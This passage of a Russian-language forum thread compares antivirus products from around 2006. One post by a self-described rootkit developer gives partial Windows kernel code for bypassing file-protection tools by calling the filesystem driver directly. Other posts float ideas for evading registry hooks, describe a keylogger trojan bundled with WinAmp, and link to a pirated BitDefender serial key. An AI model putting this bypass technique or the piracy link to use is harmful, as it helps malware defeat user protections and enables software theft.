Сейчас на форуме: sashalogout, bartolomeo, artyavmu (+8 невидимых)

 eXeL@B —› Софт, инструменты —› Обзор антивирусных программ
<< . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . 9 . 10 ... 29 . 30 . >>
Посл.ответ Сообщение


Ранг: 1288.1 (!!!!), 273thx
Активность: 1.290
Статус: Участник

Создано: 22 октября 2005 18:01
· Личное сообщение · #1

Уже тема поднималась неоднократно, просто с выходом новой версии DrWeb'a поднялась снова - какой антивирус выбрать...Предлагаю обсудить антивирусы (именно те, которые стоят на ваших домашних\рабочих компах), их плюсы и минусы. За основу думаю стоит взять наиболее популярные программы, т.к. проводить тестирование по обнаружению вирей желания нету.. Критериев несколько - скорость работы сканера, монитора, системы после установки антивиря, возможность и размеры автоматического обновления баз, разнообразие настроек. Ну и железо, на котором антивирь стоит.
Я ставил каспера 5.0 на домашний и на рабочий комп - тормоза при включенном сканере наблюдались капитальные, плюс на рабочем компе некоторые безобидные тулзы были удалены без ведома юзера (т.е. меня). К тому же полная проверка дисков висла на одном из архивов бух.проги, а после исключения из списков проверки найденные вири удаляться отказывались - каспер падал с ошибкой при удалении. Размер обновляемых баз >500 Кб в день - не очень радует...
ДрВеб 4.33 неплохо работает на домашнем компе, на рабочем (PIV-1500,128 метров памяти) тормоза жуткие, сканер полное сканирование дисков (2Х20 метров) так и не смог довести до конца. Размер обновляемых баз довольно маленький, криво реализовано автоматическое обновление. Убогий интерфейс, криво реализована автоматическая проверка...
По отзывам - Панда жутко тормозит (очень жутко).
Хотелось бы узнать, как (и какие) антивири работают у других, их достоинства и недостатки.




Ранг: 1288.1 (!!!!), 273thx
Активность: 1.290
Статус: Участник

Создано: 05 февраля 2006 21:12
· Личное сообщение · #2

Ms-Rem
Ну в принципе ты конечно прав, но хочется иметь у себя что-то более-менее приличное, чтоб защищала не от абсолютного, но все же большинства вирей и троев. Часто попадаются старые вирусы, мне недавно принесли на диске с офисом 2003 старый вирь, который калечит файлы. Ведь не будешь проверять вручную каждую запускаемую прогу или дистр.



Ранг: 71.6 (постоянный)
Активность: 0.060
Статус: Участник

Создано: 06 февраля 2006 11:19
· Личное сообщение · #3

Ms-Rem пишет:
Куда бы не пошли разработчики защиты, разработчики троянов всегда ее смогут обойти, в этом я уверен на 100%.


А так было всегда, идет гонка вооружений... Главное чтобы системы защиты в этой гонке были немножко впереди, что к сожалению не всегда так




Ранг: 120.6 (ветеран)
Активность: 0.090
Статус: Участник
rootkit developer

Создано: 06 февраля 2006 12:47
· Личное сообщение · #4

Антивирусные компании говорят, что не берут на работу бывших вирусописателей, типа у них работают только дипломированые специалисты. Мне сначала казалось что это так, пиар, но теперь я думаю что это правда. Потому что такие слабые защиты могут сделать только дипломированые специалисты, которые имеют по 5 дипломов, но никогда в жизни сами ничего не ломали. Проблема аверов в том, что у них работают спецы которые просто не понимают суть предмета. И пока из таких спецов будут набираться команды программистов, троянописателям ничего не грозит, любая сделаная ими защита это максимум 5 минут работы.

-----
Скажем дружно - нафиг нужно.




Ранг: 352.4 (мудрец), 4thx
Активность: 0.150
Статус: Участник
retired

Создано: 06 февраля 2006 12:55
· Личное сообщение · #5

Ms-Rem пишет:
Антивирусные компании говорят, что не берут на работу бывших вирусописателей, типа у них работают только дипломированые специалисты. Мне сначала казалось что это так, пиар, но теперь я думаю что это правда. Потому что такие слабые защиты могут сделать только дипломированые специалисты, которые имеют по 5 дипломов, но никогда в жизни сами ничего не ломали. Проблема аверов в том, что у них работают спецы которые просто не понимают суть предмета. И пока из таких спецов будут набираться команды программистов, троянописателям ничего не грозит, любая сделаная ими защита это максимум 5 минут работы.

хм. dr.golova & red plait - "в жизни ничего не ломали"?




Ранг: 120.6 (ветеран)
Активность: 0.090
Статус: Участник
rootkit developer

Создано: 06 февраля 2006 13:13
· Личное сообщение · #6

Ну бывают и исключения, но имхо таких мало.

-----
Скажем дружно - нафиг нужно.




Ранг: 352.4 (мудрец), 4thx
Активность: 0.150
Статус: Участник
retired

Создано: 06 февраля 2006 13:46
· Личное сообщение · #7

а тебе не кажется, что защищают так, потому что основной доход у них от корпоративных клиентов?




Ранг: 120.6 (ветеран)
Активность: 0.090
Статус: Участник
rootkit developer

Создано: 06 февраля 2006 13:51 · Поправил: Ms-Rem
· Личное сообщение · #8

[deleted]

-----
Скажем дружно - нафиг нужно.




Ранг: 79.6 (постоянный)
Активность: 0.060
Статус: Участник

Создано: 06 февраля 2006 15:29
· Личное сообщение · #9

ох рискую навлечь гнев на свою голову но кажется мне тут делятся и вирусными технологиями вот и мне хочется поделится а главное услышать ваше мнение. я поднимал подобную тему на васме но никто не стал обсуждать только dr.golova сказал что - боян. кому интересно идея описана в аттаче... имхо идея хорошая странно что об это раньше никто не писал... хотя мож и писали но я не встречал.




e418_crypto.txt.zip

-----
power and the money money and the power




Ранг: 162.2 (ветеран)
Активность: 0.090
Статус: Участник

Создано: 06 февраля 2006 18:16
· Личное сообщение · #10

Да пообсуждали её там немного, пока wasm работал. Вот wasm очнётся(или это у меня с нетом глюки), прочитаешь.



Ранг: 23.6 (новичок)
Активность: 0.010
Статус: Участник

Создано: 08 февраля 2006 02:13
· Личное сообщение · #11

В журнале Системный Администратор rapidshare.de/files/8266332/sisagmin2005-07.rar.html (3,36м)
был обзор проактивных систем защиты типа SnS.

Судя по всему будущее за такими системами.




Ранг: 420.3 (мудрец)
Активность: 0.240
Статус: Участник

Создано: 09 февраля 2006 16:23
· Личное сообщение · #12

Внимание! Данная информация предназначена только для пользователей антивирусных продуктов Dr.Web версии 4.32b и ниже. - info.drweb.com/show/2736
Может кому пригодится. Я уже споткнулся на этом...

-----
Сколько ни наталкивали на мысль – все равно сумел увернуться




Ранг: 228.7 (наставник), 2thx
Активность: 0.120
Статус: Участник
malware research

Создано: 09 февраля 2006 18:10
· Личное сообщение · #13

SASH_113 пишет:
В журнале Системный Администратор rapidshare.de/files/8266332/sisagmin2005-07.rar.html (3,36м)
был обзор проактивных систем защиты типа SnS.


Я тож думаю, что будущее за ними, но журналам не доверяю. Может кто поделится ссылками и мнениями о других системах проактивной защиты, а также о их преимуществах и недостатках. Охота провести "независимую оценку"

-----
Research is my purpose




Ранг: 52.6 (постоянный)
Активность: 0.020
Статус: Участник

Создано: 11 февраля 2006 14:35
· Личное сообщение · #14

у меня стоит Folder Guard
через неё поставил на read-only файлы типа :
*.exe;*.dll;*.zip; *.sys;*.drv;*.ax;*.scr;*.bpl;*.cpl;*.cab;*.bin;*.acm;*.com;*.doc;*.mp3
тоесть все попытки записи в такие файлы от "не доверенных" прог режутся драйвером
обозначил доверенные проги.
+
ZoneAlarm Pro version 6.1.737.000
его osfirewall он блокирует подозрительные действия программ : загрузка драйвера, открытие процесса, установка глобальных хуков и т.д.
вот и не нада никаких антивирей .
эта связка у меня уже давно и всё ок.



Ранг: 79.6 (постоянный)
Активность: 0.060
Статус: Участник

Создано: 11 февраля 2006 14:38
· Личное сообщение · #15

WarrioR

СПАСИБО! =)

-----
power and the money money and the power




Ранг: 52.6 (постоянный)
Активность: 0.020
Статус: Участник

Создано: 11 февраля 2006 14:44
· Личное сообщение · #16

doctor Ice пжалуста, а зачто спасиба то?



Ранг: 79.6 (постоянный)
Активность: 0.060
Статус: Участник

Создано: 11 февраля 2006 14:56
· Личное сообщение · #17

ну как же подсказал на чем зверей тестировать =)

-----
power and the money money and the power




Ранг: 228.7 (наставник), 2thx
Активность: 0.120
Статус: Участник
malware research

Создано: 13 февраля 2006 12:50
· Личное сообщение · #18

WarrioR пишет:
тоесть все попытки записи в такие файлы от "не доверенных" прог режутся драйвером
Да, это наверно, еще Ms-Rem до этой проги не добрался
У меня тут одна мысль появилась. Реестр винды хранится на диске в виде файлов. Если откопать этот файл в Windows, то зная как он устроен (да в HEX наверно достаточно посмотреть) можно, наверно, придумать способ, как в него что-нибудь прописать, не используя при этом RegSetValueEx и тому подобные функции... Это я про обход хуков на запись в реестр, которые устанавливают проги типа SNS... Интересно услышать мнения, насколько это реально.

-----
Research is my purpose




Ранг: 52.6 (постоянный)
Активность: 0.020
Статус: Участник

Создано: 13 февраля 2006 16:18
· Личное сообщение · #19

Error_Log пишет:
У меня тут одна мысль появилась. Реестр винды хранится на диске в виде файлов. Если откопать этот файл в Windows, то зная как он устроен (да в HEX наверно достаточно посмотреть) можно, наверно, придумать способ, как в него что-нибудь прописать, не используя при этом RegSetValueEx и тому подобные функции... Это я про обход хуков на запись в реестр, которые устанавливают проги типа SNS... Интересно услышать мнения, насколько это реально.


просто так в эти файлы записать низя, т.к. ани блокированы системой, низя даже открыть на чтение их



Ранг: 500.5 (!), 8thx
Активность: 0.230
Статус: Участник

Создано: 13 февраля 2006 17:42
· Личное сообщение · #20

Error_Log
Это было бы реально, но помойму снс ставит хуки и на запись в файлы, а не только реестр, так что борода
Кроме того, вындус не даст писать в реестр ничем кроме функций работы с реестром (если только не сбацать что нить в обход, как любит делать Ms-Rem)

-----
"Пусть видят, что мы не шутим. Стволы для понта, ножи для дела" Lock, Stock & Two Smoking Barrels




Ранг: 228.7 (наставник), 2thx
Активность: 0.120
Статус: Участник
malware research

Создано: 13 февраля 2006 18:10
· Личное сообщение · #21

Smon пишет:
если только не сбацать что нить в обход, как любит делать Ms-Rem

Я ж про то и говорю, а то я и так знаю, что низя. Просто такой фигней никто не страдал, потому-что в этом небыло необходимости, но с развитием превентивных технологий, может возникнуть...

-----
Research is my purpose





Ранг: 1288.1 (!!!!), 273thx
Активность: 1.290
Статус: Участник

Создано: 13 февраля 2006 18:14
· Личное сообщение · #22

Error_Log пишет:
Просто такой фигней никто не страдал, потому-что в этом небыло необходимости

Зря ты так думаешь-наверняка страдали...



Ранг: 1.5 (гость)
Активность: 0=0
Статус: Участник

Создано: 13 февраля 2006 23:46
· Личное сообщение · #23

на самам деле макаффи самый рульны, но пачимута пад руку пастаянна пападаеца касперыч, и приходица ставить ево. Хатя касперыч инагда проста до бешенства бесит тем што палит патчеры, ребилдэры и прочий палезный софт...каму он мешает...

ЗЫ:ещо рульный антивирус AntiVir, жаль с абнавлениями там туга




Ранг: 1288.1 (!!!!), 273thx
Активность: 1.290
Статус: Участник

Создано: 14 февраля 2006 11:03
· Личное сообщение · #24

ku-klux-klan пишет:
жаль с абнавлениями там туга

и с русским языком похоже тоже...



Ранг: 384.1 (мудрец)
Активность: 0.250
Статус: Участник
www.int3.net

Создано: 15 февраля 2006 12:03
· Личное сообщение · #25

WarrioR
ГыГы
www.uinc.ru/news/sn5381.html

-----
Подписи - ЗЛО! Нужно убирать!




Ранг: 52.6 (постоянный)
Активность: 0.020
Статус: Участник

Создано: 15 февраля 2006 20:00 · Поправил: WarrioR
· Личное сообщение · #26

nice пишет:
WarrioR
ГыГы
http://www.uinc.ru/news/sn5381.html http://www.uinc.ru/news/sn5381.html


пароли я не ставил, ибо не те цели преследовал, а абойти чо угодно можно.
главно что вирус обломится записать своё тело в исполняемые файлы

ShadowBeast сообщает о возможности обхода парольной защиты в программе Folder Guard v4.11. Обойти парольную защиту становится возможным в результате переименования или перемещения файла пароля "FGuard.FGP".

Folder Guard v4.11 старьё, я использую 6ю версию, когда защита включена то вся папка где установлена программа защищена по типу read-only, так что переименовать/переместить FGuard.FGP не получится




Ранг: 120.6 (ветеран)
Активность: 0.090
Статус: Участник
rootkit developer

Создано: 15 февраля 2006 20:50
· Личное сообщение · #27

Полный обход ShadowUser, Folder Guard и других подобных прог влезает в 15кб исходного кода. Смысл метода состоит в поиске оригинальных точек входа драйвера ФС и формировании запросов напрямую к нему, минуя все фильтры и хуки защитного софта. Полный код приводить не стану, но фрагменты покажу:

NTSTATUS
DioCreateFile(
IN PWCHAR lpFileName,
IN ULONG dwDesiredAccess,
IN ULONG dwShareMode,
IN ULONG dwCreationDisposition,
OUT PFILE_OBJECT *pFileObject
)
{
NTSTATUS status;
WCHAR Name[MAX_PATH+1] = {0};
OBJECT_ATTRIBUTES obj;
IO_STATUS_BLOCK IoStatus;
UNICODE_STRING uName;
HANDLE hFile = NULL;
PWCHAR cPtr = lpFileName + wcslen(lpFileName);
PFILE_OBJECT DirFile;

....

if (NT_SUCCESS(status))
{
PDEVICE_OBJECT DeviceObject = IoGetLovestDeviceObject(DirFile);
PIRP Irp = IoAllocateIrp(DeviceObject->StackSize, FALSE);
IO_SECURITY_CONTEXT ScContext;
ACCESS_STATE AccessState;
AUX_ACCESS_DATA AuxData;

if (DeviceObject->Flags & (DO_DIRECT_IO | DO_BUFFERED_IO))
{
IoFreeIrp(Irp);
Irp = NULL;
}

swprintf(Name, L"%ws%ws", DirFile->FileName.Buffer, cPtr);

RtlInitUnicodeString(&uName, Name);

if (Irp)
{
PIO_STACK_LOCATION IrpSp = IoGetNextIrpStackLocation(Irp);
PFILE_OBJECT FileObject;

InitializeObjectAttributes(
&obj,
NULL,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
NULL,
NULL
);

status = ObCreateObject(
KernelMode,
*IoFileObjectType,
&obj,
KernelMode,
NULL,
sizeof(FILE_OBJECT),
0,
0,
&FileObject
);

if (!NT_SUCCESS(status))
{
IoFreeIrp(Irp);
goto _exit;
}

Irp->Tail.Overlay.Thread = PsGetCurrentThread();
Irp->RequestorMode = KernelMode;
Irp->Flags = IRP_CREATE_OPERATION | IRP_SYNCHRONOUS_API | IRP_DEFER_IO_COMPLETION;

SeCreateAccessState(
&AccessState,
&AuxData,
dwDesiredAccess,
NULL
);

.....

IrpSp->Control = 0;
IrpSp->MajorFunction = IRP_MJ_CREATE;
IrpSp->Parameters.Create.EaLength = 0;
IrpSp->Flags = FILE_SYNCHRONOUS_IO_NONALERT;

Irp->Overlay.AllocationSize.QuadPart = 0;
Irp->AssociatedIrp.SystemBuffer = NULL;

IrpSp->Parameters.Create.Options = (dwCreationDisposition << 24) | (FILE_SYNCHRONOUS_IO_NONALERT & 0x00ffffff);
IrpSp->Parameters.Create.FileAttributes = FILE_ATTRIBUTE_NORMAL;
IrpSp->Parameters.Create.ShareAccess = (USHORT)dwShareMode;
IrpSp->Parameters.Create.SecurityContext = &ScContext;

......

FileObject->Type = IO_TYPE_FILE;
FileObject->Size = sizeof(FILE_OBJECT);
FileObject->RelatedFileObject = NULL;
FileObject->Flags = FO_SYNCHRONOUS_IO;

KeInitializeEvent(&FileObject->Lock, SynchronizationEvent, FALSE);

FileObject->Waiters = 0;
FileObject->CurrentByteOffset.QuadPart = 0;
FileObject->DeviceObject = DeviceObject;

Irp->Tail.Overlay.OriginalFileObject = FileObject;
IrpSp->FileObject = FileObject;

FileObject->FileName.MaximumLength = MAX_PATH*2;

FileObject->FileName.Buffer = ExAllocatePool(PagedPool, MAX_PATH*2);

RtlCopyUnicodeString(&FileObject->FileName, &uName);

KeInitializeEvent(&FileObject->Event, NotificationEvent, FALSE);

status = DirectCallDriver(DeviceObject, Irp);

if (status == STATUS_PENDING)
{
KeWaitForSingleObject(
&FileObject->Event,
Executive,
KernelMode,
FALSE,
NULL
);

status = IoStatus.Status;
}


-----
Скажем дружно - нафиг нужно.




Ранг: 52.6 (постоянный)
Активность: 0.020
Статус: Участник

Создано: 15 февраля 2006 21:14
· Личное сообщение · #28

Ms-Rem пишет:
Полный обход ShadowUser, Folder Guard и других подобных прог влезает в 15кб исходного кода. Смысл метода состоит в поиске оригинальных точек входа драйвера ФС и формировании запросов напрямую к нему, минуя все фильтры и хуки защитного софта.


сделай демку и посмотрим как ана минует все фильтры и хуки защитного софта




Ранг: 120.6 (ветеран)
Активность: 0.090
Статус: Участник
rootkit developer

Создано: 15 февраля 2006 21:16 · Поправил: Ms-Rem
· Личное сообщение · #29

Извини, демки не будет. Я показал пример кода описывающего возможность такого обхода, но ни полного кода ни демок делать не стану, пусть тот кому это надо работает над этим сам. К тому же неохото облегчать жизнь авторам защитного софта, пусть ловят в дикой природе.

-----
Скажем дружно - нафиг нужно.




Ранг: 41.2 (посетитель)
Активность: 0.030
Статус: Участник

Создано: 16 февраля 2006 14:00
· Личное сообщение · #30

Ms-Rem
SNS ты завалил что на очереди?



Ранг: 0.7 (гость)
Активность: 0=0
Статус: Участник

Создано: 17 февраля 2006 17:30
· Личное сообщение · #31

Хочу высказать личное мнеине этому поводу.
Пиведу некоторые сравнительные характеристика.
Обьем оперативы :
Под XP
- KAV 5.1.3 тянет 23 Мб + Свопит комп при скане.Для работы со сравнительно маленьким свопом нужен Windows patch, не помню какой, где-то записано.
- Dr.WEB 8 Мб - сравнительно не свопит систему.
- bitdefender_prof_v9 10 Мб - Есть опция Low Level Scan
- NOD 32 - 12 Мб

Да антивирусные базы Касперского впечетляют своим обьемом.Но это не главное в анитвире.
Приведу пример:
Мой знакомый прикрепил к WinAmp'y простой троян, упаковал его и выложил на ФТП'ешнике.
Запуская Винамп, запускается троян и собирает информацию о всех нажатых клавишах.
При этом ни Касперский ни НОД 32 ни Доктор Веб с последними обновлениями его пропустили.
Зато bitdefender_prof_v9 со стандартной базой, узнал его еще при запуске.

Поэтому я выбрал последний.Конечно у него есть свои минусы,но помоему незначительные.
Сам инстал найти не сложно, весит 17 мб, а серийный ключ можно скачать отсюда:
rapidshare.de/files/13471082/sn.txt.html


<< . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . 9 . 10 ... 29 . 30 . >>
 eXeL@B —› Софт, инструменты —› Обзор антивирусных программ
Эта тема закрыта. Ответы больше не принимаются.
   Для печати Для печати